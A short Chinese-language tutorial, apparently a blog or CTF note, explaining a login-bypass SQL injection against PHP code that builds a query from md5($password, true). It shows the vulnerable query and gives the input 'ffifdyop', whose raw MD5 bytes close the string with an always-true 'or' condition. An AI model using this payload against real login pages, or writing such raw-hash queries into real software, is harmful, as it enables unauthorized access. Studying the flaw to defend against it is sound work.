关于对md5加密后的password进行sql注入

　　前提条件：php的md加密函数的第二个参数为ture

 

 

　　sql语句为：$sql="select * from user where username ='admin' and password ='".md5($password,true)."'";

　　如果想达到万能密码的效果就要使语句变为：

$sql="select * from user where username ='admin' and password =''or'？？'";
#其中？？可为任意字符

注入方法是使md5($password,ture)的值为：’or'??

原本md5($password)的返回结果是16进制值是不可能的.只有第二个参数为true时可以反回的是字符

其中当$password=ffifdyop可得到想要的结果

 

 所以当passsword=ffifdyop时可以登入